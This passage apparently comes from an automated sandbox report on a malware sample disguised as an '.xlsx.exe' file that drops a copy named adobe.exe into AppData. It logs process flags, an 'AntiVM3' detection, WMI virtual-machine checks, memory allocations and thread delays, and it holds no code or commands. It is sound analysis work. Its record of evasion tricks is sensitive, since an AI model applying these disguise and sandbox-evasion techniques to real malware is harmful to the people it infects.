Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3312, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: 32B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: 52B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: 98F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: A8F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: 98F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory allocated: 46E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 11C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 8CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 9CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 9EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: AEC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 1680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 32E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 8ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 9ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: A0E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: B0E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 12A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239891	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239770	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239641	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239531	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239422	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239313	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239188	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239063	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238953	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238844	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238719	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238587	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238266	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238157	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238047	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599733	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596938	Jump to behavior
